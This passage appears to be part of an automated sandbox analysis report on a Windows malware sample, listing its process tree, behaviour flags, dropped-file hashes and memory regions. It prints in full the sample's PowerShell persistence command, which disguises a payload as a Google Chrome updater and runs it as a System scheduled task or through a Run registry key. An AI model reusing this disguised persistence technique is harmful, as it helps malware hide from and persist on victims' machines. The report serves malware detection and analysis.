- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe3⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC4⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "19387972241512585508775902063-770367084111309219610835078772091967417924537665"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1762930710-1810975771-1909059443-12986873881983878616-1196646335-4056316831046818306"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "465191542-13271134963070762241808683761263050543-1357736105-591656820-1821344793"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-13712896921315988633-646937543-11101801766739312162132436828-1817427182-1620231770"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-926287050-2114319891-21120764151934006926-896352991659170595-543848872-1603390531"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "19789499313549780479305097294498776227234904791307150500917444964-1254275782"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "726325594-1834741115144071641716349307451237132241990322029-1802753997396983026"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
C:\Program Files\Google\Libs\g.logFilesize
198B
MD537dd19b2be4fa7635ad6a2f3238c4af1
SHA1e5b2c034636b434faee84e82e3bce3a3d3561943
SHA2568066872eea036f3ff59d58ff82ea1d5a8248ebc3c2b6161a17fe5c48441edc07
SHA51286e8550412f282e18ef0c6417ee94e9c141433913452efffb738d92f040e20ecc5e2250e9e2ac1f94c248eab83a601cba5b006e982a4aefe9dcb88e9c53c67e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5afaf3141043b3a7428136495fe12f5c2
SHA19c089296dc8fe88fbb0d040955458c34363798f2
SHA2561f245b3f07061de00889d83aad133fb2ac368f217e32e4dcb1a6aefdeb63f696
SHA51217e202760e6ff5a4d42ee3292353c8e68a193c7925b44807ef8113f729a67cda603b1ea15d90c8b1afc879547caa05536b536b2ed111a3009af0d0110a8f66f5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD5afaf3141043b3a7428136495fe12f5c2
SHA19c089296dc8fe88fbb0d040955458c34363798f2
SHA2561f245b3f07061de00889d83aad133fb2ac368f217e32e4dcb1a6aefdeb63f696
SHA51217e202760e6ff5a4d42ee3292353c8e68a193c7925b44807ef8113f729a67cda603b1ea15d90c8b1afc879547caa05536b536b2ed111a3009af0d0110a8f66f5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L528LL6EV9QXYFC8S2U5.tempFilesize
7KB
MD5afaf3141043b3a7428136495fe12f5c2
SHA19c089296dc8fe88fbb0d040955458c34363798f2
SHA2561f245b3f07061de00889d83aad133fb2ac368f217e32e4dcb1a6aefdeb63f696
SHA51217e202760e6ff5a4d42ee3292353c8e68a193c7925b44807ef8113f729a67cda603b1ea15d90c8b1afc879547caa05536b536b2ed111a3009af0d0110a8f66f5
-
C:\Windows\Tasks\dialersvc32.jobFilesize
1KB
MD524139b140a5eefe7790598725ae1a2ee
SHA18eb3186794fe51bdc8c90b00be98e4d9341c1069
SHA256b3e9853e35550b4d41d8485a2355afa560685348cf779f53ed8aad241db9f40d
SHA512d26c807ab110b94c64c8f1bbbeb83b6fc646e382f2753d5563f3caa2a8cb9afea2eef3173c6f27c3360cd4797ddd0a2dc53dc5b772f7bd24172febb397771056
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\PIPE\srvsvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\Program Files\Google\Chrome\updater.exeFilesize
2.8MB
MD5eb27bb8cfa99d659e4fe023e9002ecd1
SHA1c783400302fdfae0518269c5a5a8d4bad29f42a3
SHA2569c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f
SHA512ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2
-
memory/280-262-0x0000000001130000-0x000000000115A000-memory.dmpFilesize
168KB
-
memory/320-133-0x000000013F0F0000-0x000000013F3B8000-memory.dmpFilesize
2.8MB
-
memory/320-128-0x000000013F0F0000-0x000000013F3B8000-memory.dmpFilesize
2.8MB
-
memory/340-263-0x0000000001BE0000-0x0000000001C0A000-memory.dmpFilesize
168KB
-
memory/340-270-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/420-121-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmpFilesize
64KB
-
memory/420-123-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/420-116-0x00000000007D0000-0x00000000007F3000-memory.dmpFilesize
140KB
-
memory/420-119-0x0000000000800000-0x000000000082A000-memory.dmpFilesize
168KB
-
memory/420-117-0x00000000007D0000-0x00000000007F3000-memory.dmpFilesize
140KB
-
memory/420-137-0x0000000000800000-0x000000000082A000-memory.dmpFilesize
168KB
-
memory/456-290-0x00000000011F0000-0x0000000001270000-memory.dmpFilesize
512KB
-
memory/456-317-0x00000000011FB000-0x0000000001232000-memory.dmpFilesize
220KB
-
memory/456-285-0x00000000009B0000-0x00000000009B8000-memory.dmpFilesize
32KB
-
memory/456-318-0x0000000019E00000-0x0000000019E2A000-memory.dmpFilesize
168KB
-
memory/456-248-0x00000000011F0000-0x0000000001270000-memory.dmpFilesize
512KB
-
memory/468-144-0x00000000008B0000-0x00000000008DA000-memory.dmpFilesize
168KB
-
memory/468-129-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/468-125-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmpFilesize
64KB
-
memory/468-122-0x00000000008B0000-0x00000000008DA000-memory.dmpFilesize
168KB
-
memory/476-131-0x00000000001E0000-0x000000000020A000-memory.dmpFilesize
168KB
-
memory/476-149-0x00000000001E0000-0x000000000020A000-memory.dmpFilesize
168KB
-
memory/476-135-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/476-134-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmpFilesize
64KB
-
memory/484-143-0x00000000001D0000-0x00000000001FA000-memory.dmpFilesize
168KB
-
memory/484-151-0x00000000001D0000-0x00000000001FA000-memory.dmpFilesize
168KB
-
memory/484-145-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmpFilesize
64KB
-
memory/484-148-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/528-276-0x00000000001E0000-0x000000000020A000-memory.dmpFilesize
168KB
-
memory/556-112-0x00000000774A0000-0x00000000775BF000-memory.dmpFilesize
1.1MB
-
memory/556-111-0x00000000775C0000-0x0000000077769000-memory.dmpFilesize
1.7MB
-
memory/556-287-0x00000000003C0000-0x00000000003EA000-memory.dmpFilesize
168KB
-
memory/556-109-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/556-113-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/556-107-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/568-138-0x0000000001090000-0x00000000010D0000-memory.dmpFilesize
256KB
-
memory/568-142-0x0000000001090000-0x00000000010D0000-memory.dmpFilesize
256KB
-
memory/568-141-0x0000000001090000-0x00000000010D0000-memory.dmpFilesize
256KB
-
memory/584-371-0x0000000000120000-0x000000000013B000-memory.dmpFilesize
108KB
-
memory/584-373-0x00000000003C0000-0x00000000003E1000-memory.dmpFilesize
132KB
-
memory/592-308-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/592-284-0x00000000007C0000-0x00000000007EA000-memory.dmpFilesize
168KB
-
memory/600-158-0x00000000004B0000-0x00000000004DA000-memory.dmpFilesize
168KB
-
memory/600-161-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmpFilesize
64KB
-
memory/600-163-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/600-239-0x00000000004B0000-0x00000000004DA000-memory.dmpFilesize
168KB
-
memory/672-72-0x0000000002510000-0x0000000002590000-memory.dmpFilesize
512KB
-
memory/672-71-0x0000000002510000-0x0000000002590000-memory.dmpFilesize
512KB
-
memory/672-68-0x000000001B1B0000-0x000000001B492000-memory.dmpFilesize
2.9MB
-
memory/672-70-0x0000000002510000-0x0000000002590000-memory.dmpFilesize
512KB
-
memory/672-69-0x0000000001F90000-0x0000000001F98000-memory.dmpFilesize
32KB
-
memory/672-73-0x000000000251B000-0x0000000002552000-memory.dmpFilesize
220KB
-
memory/676-166-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmpFilesize
64KB
-
memory/676-162-0x00000000005E0000-0x000000000060A000-memory.dmpFilesize
168KB
-
memory/676-169-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/676-247-0x00000000005E0000-0x000000000060A000-memory.dmpFilesize
168KB
-
memory/740-249-0x0000000000A10000-0x0000000000A3A000-memory.dmpFilesize
168KB
-
memory/740-168-0x0000000000A10000-0x0000000000A3A000-memory.dmpFilesize
168KB
-
memory/740-172-0x000007FEBF0D0000-0x000007FEBF0E0000-memory.dmpFilesize
64KB
-
memory/740-261-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/804-272-0x00000000001C0000-0x00000000001EA000-memory.dmpFilesize
168KB
-
memory/804-282-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/816-254-0x0000000000900000-0x000000000092A000-memory.dmpFilesize
168KB
-
memory/816-265-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/836-93-0x0000000140000000-0x0000000140056000-memory.dmpFilesize
344KB
-
memory/848-255-0x0000000000910000-0x000000000093A000-memory.dmpFilesize
168KB
-
memory/848-264-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/972-268-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/972-259-0x0000000000320000-0x000000000034A000-memory.dmpFilesize
168KB
-
memory/1004-291-0x00000000001C0000-0x00000000001EA000-memory.dmpFilesize
168KB
-
memory/1052-266-0x00000000008C0000-0x00000000008EA000-memory.dmpFilesize
168KB
-
memory/1052-273-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/1072-94-0x0000000002970000-0x00000000029F0000-memory.dmpFilesize
512KB
-
memory/1072-96-0x0000000002970000-0x00000000029F0000-memory.dmpFilesize
512KB
-
memory/1072-95-0x0000000002970000-0x00000000029F0000-memory.dmpFilesize
512KB
-
memory/1072-97-0x000000000297B000-0x00000000029B2000-memory.dmpFilesize
220KB
-
memory/1136-267-0x0000000001DB0000-0x0000000001DDA000-memory.dmpFilesize
168KB
-
memory/1136-274-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/1152-62-0x000000000278B000-0x00000000027C2000-memory.dmpFilesize
220KB
-
memory/1152-61-0x0000000002784000-0x0000000002787000-memory.dmpFilesize
12KB
-
memory/1152-60-0x0000000001F30000-0x0000000001F38000-memory.dmpFilesize
32KB
-
memory/1152-59-0x000000001B270000-0x000000001B552000-memory.dmpFilesize
2.9MB
-
memory/1176-269-0x0000000001BE0000-0x0000000001C0A000-memory.dmpFilesize
168KB
-
memory/1204-102-0x00000000008B0000-0x00000000008B8000-memory.dmpFilesize
32KB
-
memory/1204-110-0x000000000123B000-0x0000000001272000-memory.dmpFilesize
220KB
-
memory/1204-104-0x0000000000E20000-0x0000000000E60000-memory.dmpFilesize
256KB
-
memory/1204-105-0x00000000775C0000-0x0000000077769000-memory.dmpFilesize
1.7MB
-
memory/1204-101-0x0000000001230000-0x00000000012B0000-memory.dmpFilesize
512KB
-
memory/1204-106-0x00000000774A0000-0x00000000775BF000-memory.dmpFilesize
1.1MB
-
memory/1248-278-0x0000000037600000-0x0000000037610000-memory.dmpFilesize
64KB
-
memory/1248-271-0x0000000002A10000-0x0000000002A3A000-memory.dmpFilesize
168KB
-
memory/1256-355-0x0000000000110000-0x000000000013A000-memory.dmpFilesize
168KB
-
memory/1364-54-0x000000013FF00000-0x00000001401C8000-memory.dmpFilesize
2.8MB
-
memory/1364-76-0x000000013FF00000-0x00000001401C8000-memory.dmpFilesize
2.8MB
-
memory/1680-320-0x0000000019C80000-0x0000000019F62000-memory.dmpFilesize
2.9MB
-
memory/1680-375-0x0000000001270000-0x00000000012F0000-memory.dmpFilesize
512KB
-
memory/1680-321-0x0000000000A40000-0x0000000000A48000-memory.dmpFilesize
32KB
-
memory/1928-280-0x00000000002E0000-0x000000000030A000-memory.dmpFilesize
168KB